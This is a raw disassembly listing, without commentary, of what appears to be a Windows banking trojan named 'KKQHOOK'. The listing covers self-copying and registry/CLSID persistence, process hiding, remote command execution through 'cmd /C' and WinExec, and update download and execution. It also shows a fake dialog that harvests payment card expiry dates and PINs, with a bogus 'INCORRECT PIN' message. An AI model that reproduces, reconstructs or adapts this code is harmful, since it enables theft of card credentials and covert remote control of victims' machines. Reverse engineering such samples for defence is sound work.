cmp byte ptr [ecx+eax], 0
jnz short loc_405CF9
movzx edx, [ebp+var_156D]
cmp edx, eax
jb short loc_405CD2
lea ecx, [ebp+var_256C]
or eax, 0FFFFFFFFh
loc_405D14: ; CODE XREF: sub_405AAC+26D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_405D14
lea edx, [ebp+var_356B]
push edx
push eax
lea edi, [ebp+var_256C]
push edi
call sub_405350
add esp, 0Ch
mov [ebp+var_3570], eax
push 1
push offset aWpst ; "wpst "
lea eax, [ebp+var_256C]
push eax
call sub_401429
add esp, 0Ch
cmp eax, 0
jnz loc_40601D
lea eax, [ebp+var_2567]
push eax
lea eax, [ebp+var_4573]
push eax
call sub_4078EC
mov [ebp+var_3574], 0
mov [ebp+var_4578], 4
lea eax, [ebp+var_4584]
push eax
lea eax, [ebp+var_4578]
push eax
lea eax, [ebp+var_3574]
push eax
push offset aOfstkkq ; "ofstkkq"
push offset aSoftwareMicr_4 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_401326
add esp, 18h
lea eax, [ebp+var_604]
push eax
push 0
push 0
push offset aQ ; "q"
push offset aKkqhook ; "KKQHOOK"
lea eax, [ebp+var_600]
push eax
lea eax, [ebp+var_4573]
push eax
push offset dword_409020
call sub_403D8E
add esp, 20h
mov esi, eax
cmp esi, 0
jnz short loc_405DF2
lea eax, [ebp+var_600]
push eax
call sub_40251A
add esp, 4
jmp short loc_405E20
; ---------------------------------------------------------------------------
loc_405DF2: ; CODE XREF: sub_405AAC+333�j
push 4
push 4
lea eax, [ebp+var_604]
push eax
push offset aOfstkkq ; "ofstkkq"
push offset aSoftwareMicr_4 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_401379
lea eax, [ebp+var_600]
push eax
call sub_40251A
add esp, 1Ch
loc_405E20: ; CODE XREF: sub_405AAC+344�j
and [ebp+var_3574], 0
mov [ebp+var_4578], 4
lea eax, [ebp+var_4584]
push eax
lea eax, [ebp+var_4578]
push eax
lea eax, [ebp+var_3574]
push eax
push offset aOfstkkqc ; "ofstkkqc"
push offset aSoftwareMicr_4 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_401326
add esp, 18h
push 0
push 0
push 4
push 0
push 0
push 80000000h
push offset dword_408010
call sub_407A8C ; CreateFileA
mov [ebp+var_457C], eax
push 0
push eax
call sub_407954 ; GetFileSize
mov [ebp+var_4688], eax
push [ebp+var_457C]
call sub_407984 ; CloseHandle
mov eax, [ebp+var_4688]
cmp [ebp+var_3574], eax
jnb loc_405F5B
push 8
lea eax, [ebp+var_4683]
push eax
call sub_4013E4
lea eax, [ebp+var_4683]
push eax
push offset dword_419160
push offset aSS_tmp ; "%s\\%s.tmp"
lea eax, [ebp+var_600]
push eax
call sub_407E40
lea eax, [ebp+var_600]
push eax
call sub_4024E0
lea eax, [ebp+var_604]
push eax
push 0
push [ebp+var_3574]
push offset aQ ; "q"
push offset aKkqhook ; "KKQHOOK"
lea eax, [ebp+var_600]
push eax
lea eax, [ebp+var_4573]
push eax
push offset dword_408010
call sub_403D8E
mov esi, eax
lea eax, [ebp+var_600]
push eax
call sub_407B70 ; DeleteFileA
lea eax, [ebp+var_600]
push eax
call sub_40251A
add esp, 40h
or esi, esi
jz short loc_405F5B
cmp [ebp+var_604], 0
jz short loc_405F5B
push 4
push 4
lea eax, [ebp+var_604]
push eax
push offset aOfstkkqc ; "ofstkkqc"
push offset aSoftwareMicr_4 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_401379
add esp, 18h
loc_405F5B: ; CODE XREF: sub_405AAC+3F5�j
; sub_405AAC+482�j ...
push 0
push 80h
push 3
push 0
push 0
push 80000000h
push offset dword_408A40
call sub_407A8C ; CreateFileA
mov [ebp+var_4580], eax
cmp eax, 0FFFFFFFFh
jz loc_406238
push [ebp+var_4580]
call sub_407984 ; CloseHandle
lea eax, [ebp+var_4573]
push eax
lea eax, [ebp+var_E04]
push eax
call sub_407E40
push offset a?dmp2 ; "?dmp=2"
lea eax, [ebp+var_E04]
push eax
call sub_407E64
lea eax, [ebp+var_600]
push eax
call sub_4024E0
lea eax, [ebp+var_604]
push eax
push 0
push [ebp+var_3574]
push offset aQ ; "q"
push offset aKkqhook ; "KKQHOOK"
lea eax, [ebp+var_600]
push eax
lea eax, [ebp+var_E04]
push eax
push offset dword_408A40
call sub_403D8E
mov esi, eax
lea eax, [ebp+var_600]
push eax
call sub_407B70 ; DeleteFileA
lea eax, [ebp+var_600]
push eax
call sub_40251A
add esp, 38h
or esi, esi
jz short loc_40601D
push offset dword_408A40
call sub_407B70 ; DeleteFileA
loc_40601D: ; CODE XREF: sub_405AAC+2A5�j
; sub_405AAC+565�j
cmp [ebp+var_200], 3Ah
jnz loc_40614F
cmp [ebp+var_1FD], 3Ah
jnz loc_40614F
mov [ebp+var_1FD], 0
lea eax, [ebp+var_3574]
push eax
push offset a02u ; ":%02u"
lea eax, [ebp+var_200]
push eax
call sub_407E58
add esp, 0Ch
cmp [ebp+var_3574], 0
jz short loc_40608B
call sub_407E28
mov edx, 621B97C3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
inc edi
cmp edi, [ebp+var_3574]
ja loc_40620D
loc_40608B: ; CODE XREF: sub_405AAC+5B4�j
cmp ds:dword_408F50, 2
jnz short loc_4060D3
push 400h
lea eax, [ebp+var_600]
push eax
call sub_40799C ; GetSystemDirectoryA
lea eax, [ebp+var_600]
push eax
push offset aSCmd_pif ; "%s\\cmd.pif"
lea eax, [ebp+var_100B]
push eax
call sub_407E40
push offset aCmd_exe ; "\\cmd.exe"
lea eax, [ebp+var_600]
push eax
call sub_407E64
add esp, 14h
jmp short loc_406110
; ---------------------------------------------------------------------------
loc_4060D3: ; CODE XREF: sub_405AAC+5E6�j
push 400h
lea eax, [ebp+var_600]
push eax
call sub_4079E4 ; GetWindowsDirectoryA
lea eax, [ebp+var_600]
push eax
push offset aSCommand_pif ; "%s\\command.pif"
lea eax, [ebp+var_100B]
push eax
call sub_407E40
push offset aCommand_com ; "\\command.com"
lea eax, [ebp+var_600]
push eax
call sub_407E64
add esp, 14h
loc_406110: ; CODE XREF: sub_405AAC+625�j
lea eax, [ebp+var_100B]
push eax
call sub_407B70 ; DeleteFileA
lea eax, [ebp+var_200]
add eax, 4
push eax
lea eax, [ebp+var_600]
push eax
push offset aSCS ; "%s /C %s"
lea eax, [ebp+var_600]
push eax
call sub_407E40
add esp, 10h
push 0
lea eax, [ebp+var_600]
push eax
call sub_407B34 ; WinExec
loc_40614F: ; CODE XREF: sub_405AAC+578�j
; sub_405AAC+585�j
push 1
push offset aWupd ; "wupd "
lea eax, [ebp+var_200]
push eax
call sub_401429
add esp, 0Ch
or eax, eax
jnz loc_40620D
push 7
lea eax, [ebp+var_F07]
push eax
call sub_4013E4
lea eax, [ebp+var_F07]
push eax
push offset dword_419160
push offset aSS_dat ; "%s\\%s.dat"
lea eax, [ebp+var_456F]
push eax
call sub_407E40
lea eax, [ebp+var_1FB]
push eax
lea eax, [ebp+var_556E]
push eax
call sub_4078EC
push 0
push 0
push 0
push offset aQ ; "q"
push offset aXd2 ; "xd2"
lea eax, [ebp+var_456F]
push eax
lea eax, [ebp+var_556E]
push eax
push 0
call sub_403D8E
add esp, 38h
mov esi, eax
cmp esi, 2
jnz short loc_40620D
push 0
lea eax, [ebp+var_456F]
push eax
call sub_407B34 ; WinExec
push 1
push offset aNewver ; "newver"
lea eax, [ebp+var_556E]
push eax
call sub_401429
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_40620D
push 1
call sub_407DEC
pop ecx
loc_40620D: ; CODE XREF: sub_405AAC+1B1�j
; sub_405AAC+1BD�j ...
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+var_E08]
call sub_401560
add esp, 0Ch
mov ebx, eax
or eax, eax
jnz loc_405C62
push [ebp+var_E08]
call sub_407A68 ; LocalFree
loc_406238: ; CODE XREF: sub_405AAC+14C�j
; sub_405AAC+190�j ...
fld dbl_4245E4
fimul dword_41A0A0
mov edi, eax
call sub_407844
xchg eax, edi
push edi
call sub_407DE0
mov edi, dword_41A0A4
sub edi, eax
inc edi
mov [ebp+var_1010], edi
mov eax, edi
mov [ebp-1570h], eax
push eax
call sub_407DE0
add esp, 8
mov edi, [ebp-1570h]
add edi, eax
mov [ebp+var_1010], edi
mov eax, edi
mov edi, dword_41A0A4
sub edi, dword_41A0A0
mov ecx, edi
inc ecx
xor edx, edx
div ecx
mov [ebp+var_1574], eax
mov [ebp+var_1010], eax
call sub_407E28
mov [ebp+var_1578], eax
mov eax, dword_41A0A0
mov edx, 66666667h
push ecx
mov ecx, eax
imul edx
sar edx, 1
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
lea edi, [eax+eax*4]
mov edx, [ebp+var_1010]
mov ecx, [ebp+var_1578]
mov eax, edx
imul eax, [ebp+var_1578]
mov ecx, 0Ah
cdq
idiv ecx
lea edi, [edi+edx+5]
mov dword_41A0A0, edi
mov eax, dword_41A0A4
cmp edi, eax
jbe short loc_4062FF
and dword_41A0A0, 0
loc_4062FF: ; CODE XREF: sub_405AAC+84A�j
push 493E0h
call sub_407DC8
pop ecx
jmp loc_405AC8
sub_405AAC endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406316 proc near ; CODE XREF: sub_406344+C�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
push offset aKkqhook_28 ; "KKQHOOK_28"
push 0
push 1F0001h
call sub_407A74 ; OpenMutexA
mov [ebp+var_4], eax
or eax, eax
jz short loc_406341
push eax
call sub_407984 ; CloseHandle
push 1
call sub_407DEC
pop ecx
loc_406341: ; CODE XREF: sub_406316+1B�j
pop edi
leave
retn
sub_406316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406344 proc near ; CODE XREF: sub_407868+5C�p
var_750 = dword ptr -750h
var_74C = byte ptr -74Ch
var_748 = byte ptr -748h
var_742 = byte ptr -742h
var_643 = byte ptr -643h
var_544 = byte ptr -544h
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = byte ptr -438h
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = byte ptr -32Ch
var_2C8 = byte ptr -2C8h
var_264 = byte ptr -264h
var_160 = byte ptr -160h
var_5C = dword ptr -5Ch
var_55 = dword ptr -55h
var_51 = dword ptr -51h
var_4D = dword ptr -4Dh
var_49 = dword ptr -49h
var_45 = dword ptr -45h
var_41 = dword ptr -41h
var_3D = dword ptr -3Dh
var_39 = dword ptr -39h
var_35 = dword ptr -35h
var_31 = dword ptr -31h
var_2D = byte ptr -2Dh
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_1D = byte ptr -1Dh
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 750h
push ebx
push esi
push edi
call sub_406316
push 104h
lea eax, [ebp+var_160]
push eax
call sub_40799C ; GetSystemDirectoryA
push offset aDriversNdisrd_ ; "\\drivers\\ndisrd.sys"
lea eax, [ebp+var_160]
push eax
call sub_407E64
add esp, 8
push 0
push 0
push 3
push 0
push 0
push 80000001h
lea eax, [ebp+var_160]
push eax
call sub_407A8C ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4063A3
call sub_40523F
jmp short loc_4063A9
; ---------------------------------------------------------------------------
loc_4063A3: ; CODE XREF: sub_406344+56�j
push esi
call sub_407984 ; CloseHandle
loc_4063A9: ; CODE XREF: sub_406344+5D�j
push offset aEnabledsf ; "enabledsf"
call sub_4079F0 ; GlobalAddAtomA
mov eax, [ebp+arg_0]
mov ds:dword_409008, eax
mov ds:dword_408F40, 94h
push offset dword_408F40
call sub_4079CC ; GetVersionExA
push 0FFh
push offset dword_419160
call sub_40799C ; GetSystemDirectoryA
call sub_4079B4 ; GetTickCount
push eax
call sub_407E4C
push 104h
lea eax, [ebp+var_438]
push eax
push [ebp+arg_0]
call sub_40796C ; GetModuleFileNameA
and [ebp+var_5C], 0
mov [ebp+var_43C], 4
lea eax, [ebp+var_748]
push eax
lea eax, [ebp+var_43C]
push eax
lea eax, [ebp+var_5C]
push eax
push offset aKkqhook ; "KKQHOOK"
push offset aSoftwareMicr_4 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_401326
add esp, 1Ch
mov [ebp+var_440], eax
or eax, eax
jz short loc_406456
cmp [ebp+var_5C], 1Ch
jbe short loc_40644C
push 1
call sub_407DEC
pop ecx
loc_40644C: ; CODE XREF: sub_406344+FE�j
cmp [ebp+var_5C], 1Ch
jz loc_40653A
loc_406456: ; CODE XREF: sub_406344+F8�j
call sub_407E28
mov edx, 10624DD3h
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov edi, edx
add edi, 41h
mov ebx, edi
mov [ebp+var_2D], bl
mov [ebp+var_1], 1
jmp short loc_4064A3
; ---------------------------------------------------------------------------
loc_40647C: ; CODE XREF: sub_406344+164�j
call sub_407E28
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov ebx, edx
add ebx, 61h
mov [ebp+edi+var_2D], bl
add [ebp+var_1], 1
loc_4064A3: ; CODE XREF: sub_406344+136�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_40647C
mov [ebp+var_25], 0
call sub_407E28
mov edx, eax
test dl, 1
jnz short loc_4064C2
mov [ebp+var_27], 33h
mov [ebp+var_26], 32h
loc_4064C2: ; CODE XREF: sub_406344+174�j
lea eax, [ebp+var_2D]
push eax
push offset dword_419160
push offset aSS_exe ; "%s\\%s.exe"
lea eax, [ebp+var_264]
push eax
call sub_407E40
push 0
lea eax, [ebp+var_264]
push eax
lea eax, [ebp+var_438]
push eax
call sub_407A20 ; CopyFileA
lea eax, [ebp+var_2D]
push eax
call sub_40284A
mov [ebp+var_5C], 1Ch
push 4
push 4
lea eax, [ebp+var_5C]
push eax
push offset aKkqhook ; "KKQHOOK"
push offset aSoftwareMicr_4 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_401379
add esp, 2Ch
push 0
lea eax, [ebp+var_264]
push eax
call sub_407B34 ; WinExec
call sub_402B0D
push 1
call sub_407918 ; ExitProcess
loc_40653A: ; CODE XREF: sub_406344+10C�j
push offset aKkq32_dll ; "kkq32.dll"
push offset dword_419160
push offset aSS ; "%s\\%s"
push offset dword_409020
call sub_407E40
push offset aDnkkq_dll ; "dnkkq.dll"
push offset dword_419160
push offset aSS ; "%s\\%s"
push offset dword_408120
call sub_407E40
push offset aDatkkq32_dll ; "datkkq32.dll"
push offset dword_419160
push offset aSS ; "%s\\%s"
push offset dword_408010
call sub_407E40
push 0FFh
push offset dword_408A40
call sub_4079E4 ; GetWindowsDirectoryA
push offset aBoot_sys ; "\\boot.sys"
push offset dword_408A40
call sub_407E64
lea eax, aKkqhook ; "KKQHOOK"
mov [ebp+var_31], eax
mov eax, ds:dword_409008
mov [ebp+var_45], eax
lea eax, sub_4068A8
mov [ebp+var_51], eax
push 7F00h
push 0
call sub_407BD0 ; LoadCursorA
mov [ebp+var_3D], eax
push 7F03h
push 0
call sub_407BDC ; LoadIconA
mov [ebp+var_41], eax
and [ebp+var_35], 0
push 0
call sub_407CD8 ; GetStockObject
mov [ebp+var_39], eax
mov [ebp+var_55], 3
and [ebp+var_4D], 0
and [ebp+var_49], 0
lea eax, [ebp+var_55]
push eax
call sub_407BF4 ; RegisterClassA
push 0
push ds:dword_409008
push 0
push 0
push 0
push 0
push 0
push 0
push 0CA0000h
push offset aKkqhook ; "KKQHOOK"
push offset aKkqhook ; "KKQHOOK"
push 0
call sub_407C9C ; CreateWindowExA
mov ds:dword_408FE4, eax
push offset aKkqhook_28 ; "KKQHOOK_28"
push 0
push 0
call sub_407AD4 ; CreateMutexA
push 2
call sub_401EAF
add esp, 3Ch
call sub_4079C0 ; GetVersion
cmp eax, 80000000h
jb short loc_40667D
push offset aKernel32_dll_1 ; "kernel32.dll"
call sub_407978 ; GetModuleHandleA
push offset aRegisterservic ; "RegisterServiceProcess"
push eax
call sub_407990 ; GetProcAddress
mov [ebp+var_750], eax
call sub_40793C ; GetCurrentProcessId
push 1
push eax
call [ebp+var_750]
loc_40667D: ; CODE XREF: sub_406344+30E�j
push 104h
lea eax, [ebp+var_544]
push eax
push 0
call sub_40796C ; GetModuleFileNameA
lea eax, [ebp+var_544]
push eax
call sub_4024E0
push offset dword_409020
call sub_4024E0
push offset dword_408120
call sub_4024E0
push offset dword_408010
call sub_4024E0
call sub_40793C ; GetCurrentProcessId
push eax
call sub_402613
lea eax, [ebp+var_2C8]
push eax
call sub_4026EE
and [ebp+var_330], 0
mov [ebp+var_334], 64h
lea eax, [ebp+var_330]
push eax
lea eax, [ebp+var_334]
push eax
lea eax, [ebp+var_32C]
push eax
lea eax, [ebp+var_2C8]
push eax
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_401326
push offset aK ; "K"
lea eax, [ebp+var_32C]
push eax
call sub_402638
push offset aV ; "V"
lea eax, [ebp+var_2C8]
push eax
call sub_402638
lea eax, [ebp+var_32C]
push eax
push offset aClsidSInprocse ; "CLSID\\%s\\InProcServer32"
lea eax, [ebp+var_742]
push eax
call sub_407E40
lea eax, [ebp+var_330]
push eax
lea eax, [ebp+var_334]
push eax
lea eax, [ebp+var_643]
push eax
push 0
lea eax, [ebp+var_742]
push eax
push 80000000h
call sub_401326
lea eax, [ebp+var_643]
push eax
call sub_4024E0
call sub_402784
push offset sub_404FCE
call sub_404F53
add esp, 6Ch
lea eax, [ebp+var_74C]
push eax
push 0
push 0
push offset sub_405AAC
push 0
push 0
call sub_407B64 ; CreateThread
push eax
call sub_407984 ; CloseHandle
push 0
push 1F4h
push 1
push ds:dword_408FE4
call sub_407BE8 ; SetTimer
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067C2: ; CODE XREF: sub_406344+4A1�j
lea eax, [ebp+var_1D]
push eax
call sub_407C54 ; TranslateMessage
lea eax, [ebp+var_1D]
push eax
call sub_407C60 ; DispatchMessageA
loc_4067D4: ; CODE XREF: sub_406344+47C�j
push 0
push 0
push 0
lea eax, [ebp+var_1D]
push eax
call sub_407C0C ; GetMessageA
or eax, eax
jnz short loc_4067C2
pop edi
pop esi
pop ebx
leave
retn 10h
sub_406344 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067EE proc near ; DATA XREF: sub_40553F+4E0�o
; sub_40553F+504�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, [ebp+arg_4]
cmp eax, 100h
jnz short loc_406853
cmp [ebp+arg_8], 9
jnz short loc_406853
cmp edi, ds:dword_40861C
jnz short loc_40681A
push ds:dword_419150
call sub_407BB8 ; SetFocus
loc_40681A: ; CODE XREF: sub_4067EE+1F�j
cmp edi, ds:dword_419150
jnz short loc_40682D
push ds:dword_409000
call sub_407BB8 ; SetFocus
loc_40682D: ; CODE XREF: sub_4067EE+32�j
cmp edi, ds:dword_409000
jnz short loc_406840
push ds:dword_408FF8
call sub_407BB8 ; SetFocus
loc_406840: ; CODE XREF: sub_4067EE+45�j
cmp edi, ds:dword_408FF8
jnz short loc_406853
push ds:dword_419150
call sub_407BB8 ; SetFocus
loc_406853: ; CODE XREF: sub_4067EE+11�j
; sub_4067EE+17�j ...
xor esi, esi
cmp edi, ds:dword_419150
jnz short loc_406863
mov esi, ds:dword_409010
loc_406863: ; CODE XREF: sub_4067EE+6D�j
cmp edi, ds:dword_409000
jnz short loc_406871
mov esi, ds:dword_408FFC
loc_406871: ; CODE XREF: sub_4067EE+7B�j
cmp edi, ds:dword_40861C
jnz short loc_40687F
mov esi, ds:dword_408000
loc_40687F: ; CODE XREF: sub_4067EE+89�j
cmp edi, ds:dword_408FF8
jnz short loc_40688D
mov esi, ds:dword_408A1C
loc_40688D: ; CODE XREF: sub_4067EE+97�j
or esi, esi
jz short loc_4068A1
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push edi
push esi
call sub_407CCC ; CallWindowProcA
loc_4068A1: ; CODE XREF: sub_4067EE+A1�j
pop edi
pop esi
pop ebx
pop ebp
retn 10h
sub_4067EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4068A8 proc near ; DATA XREF: sub_406344+270�o
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_20B = byte ptr -20Bh
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_101 = byte ptr -101h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 238h
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
cmp eax, 10h
jz loc_406A0D
jg short loc_4068D0
cmp eax, 2
jz loc_4069F3
jmp loc_406E27
; ---------------------------------------------------------------------------
loc_4068D0: ; CODE XREF: sub_4068A8+18�j
cmp eax, 111h
jz loc_406AC6
cmp eax, 113h
jz short loc_4068FD
cmp eax, 111h
jl loc_406E27
cmp eax, 138h
jz loc_406A28
jmp loc_406E27
; ---------------------------------------------------------------------------
loc_4068FD: ; CODE XREF: sub_4068A8+38�j
cmp dword_41A1F8, 0
jz loc_4069C9
push offset aDocobject ; "DocObject"
push dword_41A1F8
call sub_4054DD
mov [ebp+var_214], eax
push offset aExplorer ; "Explorer"
push eax
call sub_4054DD
add esp, 10h
mov [ebp+var_218], eax
lea eax, [ebp+var_228]
push eax
push [ebp+var_218]
call sub_407B88 ; GetWindowRect
or eax, eax
jz short loc_4069C9
lea eax, [ebp+var_238]
push eax
push ds:dword_409124
call sub_407B88 ; GetWindowRect
or eax, eax
jz short loc_4069C9
mov eax, [ebp+var_220]
sub eax, [ebp+var_228]
sub eax, 4
mov edx, [ebp+var_230]
sub edx, [ebp+var_238]
cmp eax, edx
jnz short loc_40699E
mov eax, [ebp+var_21C]
sub eax, [ebp+var_224]
sub eax, 4
mov edx, [ebp+var_22C]
sub edx, [ebp+var_234]
cmp eax, edx
jz short loc_4069C9
loc_40699E: ; CODE XREF: sub_4068A8+D5�j
push 1
mov eax, [ebp+var_21C]
sub eax, [ebp+var_224]
push eax
mov eax, [ebp+var_220]
sub eax, [ebp+var_228]
push eax
push 0
push 0
push ds:dword_409124
call sub_407CB4 ; MoveWindow
loc_4069C9: ; CODE XREF: sub_4068A8+5C�j
; sub_4068A8+A0�j ...
cmp dword_41A1F4, 0
jz loc_406E38
mov eax, dword_41A1F4
mov dword_41A1F8, eax
and dword_41A1F4, 0
push eax
call sub_40553F
pop ecx
jmp loc_406E38
; ---------------------------------------------------------------------------
loc_4069F3: ; CODE XREF: sub_4068A8+1D�j
mov eax, ds:dword_408FE4
cmp [ebp+arg_0], eax
jnz loc_406E38
push 0
call sub_407C84 ; PostQuitMessage
jmp loc_406E38
; ---------------------------------------------------------------------------
loc_406A0D: ; CODE XREF: sub_4068A8+12�j
mov eax, ds:dword_408FE4
cmp [ebp+arg_0], eax
jnz loc_406E38
push [ebp+arg_0]
call sub_407CA8 ; DestroyWindow
jmp loc_406E38
; ---------------------------------------------------------------------------
loc_406A28: ; CODE XREF: sub_4068A8+4A�j
mov eax, [ebp+arg_C]
mov [ebp+var_10C], eax
cmp eax, ds:dword_419148
jz short loc_406A65
cmp eax, ds:dword_408A20
jz short loc_406A65
cmp eax, ds:dword_408FDC
jz short loc_406A65
cmp eax, ds:dword_419360
jz short loc_406A65
cmp eax, ds:dword_41914C
jz short loc_406A65
cmp eax, ds:dword_419368
jnz loc_406E38
loc_406A65: ; CODE XREF: sub_4068A8+18F�j
; sub_4068A8+197�j ...
mov eax, [ebp+var_10C]
cmp eax, ds:dword_41914C
jz short loc_406A7B
cmp eax, ds:dword_419368
jnz short loc_406A8A
loc_406A7B: ; CODE XREF: sub_4068A8+1C9�j
push 1010B0h
push [ebp+arg_8]
call sub_407CF0 ; SetTextColor
jmp short loc_406A94
; ---------------------------------------------------------------------------
loc_406A8A: ; CODE XREF: sub_4068A8+1D1�j
push 0
push [ebp+arg_8]
call sub_407CF0 ; SetTextColor
loc_406A94: ; CODE XREF: sub_4068A8+1E0�j
push 0FFFFFFh
push [ebp+arg_8]
call sub_407CE4 ; SetBkColor
and [ebp+var_220], 0
and [ebp+var_21C], 0
lea eax, [ebp+var_220]
push eax
call sub_407CFC ; CreateBrushIndirect
mov [ebp+var_214], eax
jmp loc_406E38
; ---------------------------------------------------------------------------
loc_406AC6: ; CODE XREF: sub_4068A8+2D�j
push offset byte_419260
push offset aS_0 ; "%s"
lea eax, [ebp+var_20B]
push eax
call sub_407E40
add esp, 0Ch
push 0FFh
lea eax, [ebp+var_FF]
push eax
push ds:dword_419150
call sub_407B7C ; GetWindowTextA
cmp [ebp+var_FF], 0
jnz short loc_406B1F
push 0
push 0
push offset aPleaseSelectEx ; "Please, select Expiration Month"
push 0
call sub_407C00 ; MessageBoxA
push ds:dword_419150
call sub_407BB8 ; SetFocus
jmp loc_406E38
; ---------------------------------------------------------------------------
loc_406B1F: ; CODE XREF: sub_4068A8+255�j
lea eax, [ebp+var_FF]
push eax
lea eax, [ebp+var_20B]
push eax
push offset aSS_0 ; "%s %s"
lea eax, [ebp+var_20B]
push eax
call sub_407E40
add esp, 10h
push 0FFh
lea eax, [ebp+var_FF]
push eax
push ds:dword_409000
call sub_407B7C ; GetWindowTextA
cmp [ebp+var_FF], 0
jnz short loc_406B81
push 0
push 0
push offset aPleaseSelect_0 ; "Please, select Expiration Year"
push 0
call sub_407C00 ; MessageBoxA
push ds:dword_409000
call sub_407BB8 ; SetFocus
jmp loc_406E38
; ---------------------------------------------------------------------------
loc_406B81: ; CODE XREF: sub_4068A8+2B7�j
lea eax, [ebp+var_FF]
push eax
lea eax, [ebp+var_20B]
push eax
push offset aSS_1 ; "%s-%s"
lea eax, [ebp+var_20B]
push eax
call sub_407E40
add esp, 10h
push 0FFh
lea eax, [ebp+var_FF]
push eax
push ds:dword_408FF8
call sub_407B7C ; GetWindowTextA
cmp [ebp+var_FF], 0
jz loc_406CBE
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_406BD0: ; CODE XREF: sub_4068A8+32D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_406BD0
cmp eax, 4
jb loc_406CBE
mov [ebp+var_101], 0
jmp short loc_406C0B
; ---------------------------------------------------------------------------
loc_406BE9: ; CODE XREF: sub_4068A8+37C�j
movzx eax, [ebp+var_101]
mov al, [ebp+eax+var_FF]
cmp al, 30h
jl short loc_406BFF
cmp al, 39h
jle short loc_406C04
loc_406BFF: ; CODE XREF: sub_4068A8+351�j
jmp loc_406CBE
; ---------------------------------------------------------------------------
loc_406C04: ; CODE XREF: sub_4068A8+355�j
add [ebp+var_101], 1
loc_406C0B: ; CODE XREF: sub_4068A8+33F�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_406C14: ; CODE XREF: sub_4068A8+371�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_406C14
movzx ebx, [ebp+var_101]
cmp ebx, eax
jb short loc_406BE9
mov [ebp+var_100], 0
jmp short loc_406C9D
; ---------------------------------------------------------------------------
loc_406C2F: ; CODE XREF: sub_4068A8+40E�j
mov al, [ebp+var_100]
mov byte ptr [ebp+var_214+3], al
jmp short loc_406C66
; ---------------------------------------------------------------------------
loc_406C3D: ; CODE XREF: sub_4068A8+3D7�j
movzx eax, byte ptr [ebp+var_214+3]
movsx eax, [ebp+eax+var_FF]
movzx edx, [ebp+var_100]
movsx edx, [ebp+edx+var_FF]
cmp eax, edx
jnz short loc_406C81
add byte ptr [ebp+var_214+3], 1
loc_406C66: ; CODE XREF: sub_4068A8+393�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_406C6F: ; CODE XREF: sub_4068A8+3CC�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_406C6F
movzx ebx, byte ptr [ebp+var_214+3]
cmp ebx, eax
jb short loc_406C3D
loc_406C81: ; CODE XREF: sub_4068A8+3B5�j
movzx eax, byte ptr [ebp+var_214+3]
movzx edx, [ebp+var_100]
sub eax, edx
cmp eax, 3
jg short loc_406CBE
add [ebp+var_100], 1
loc_406C9D: ; CODE XREF: sub_4068A8+385�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_406CA6: ; CODE XREF: sub_4068A8+403�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_406CA6
movzx ebx, [ebp+var_100]
cmp ebx, eax
jb loc_406C2F
jmp short loc_406CEC
; ---------------------------------------------------------------------------
loc_406CBE: ; CODE XREF: sub_4068A8+319�j
; sub_4068A8+332�j ...
push 7D0h
call sub_407DC8
pop ecx
push 0
push offset aUnableToAuth_0 ; "Unable to authorize"
push offset aUnableToAuth_1 ; "Unable to authorize - INCORRECT PIN. Pl"...
push 0
call sub_407C00 ; MessageBoxA
push ds:dword_408FF8
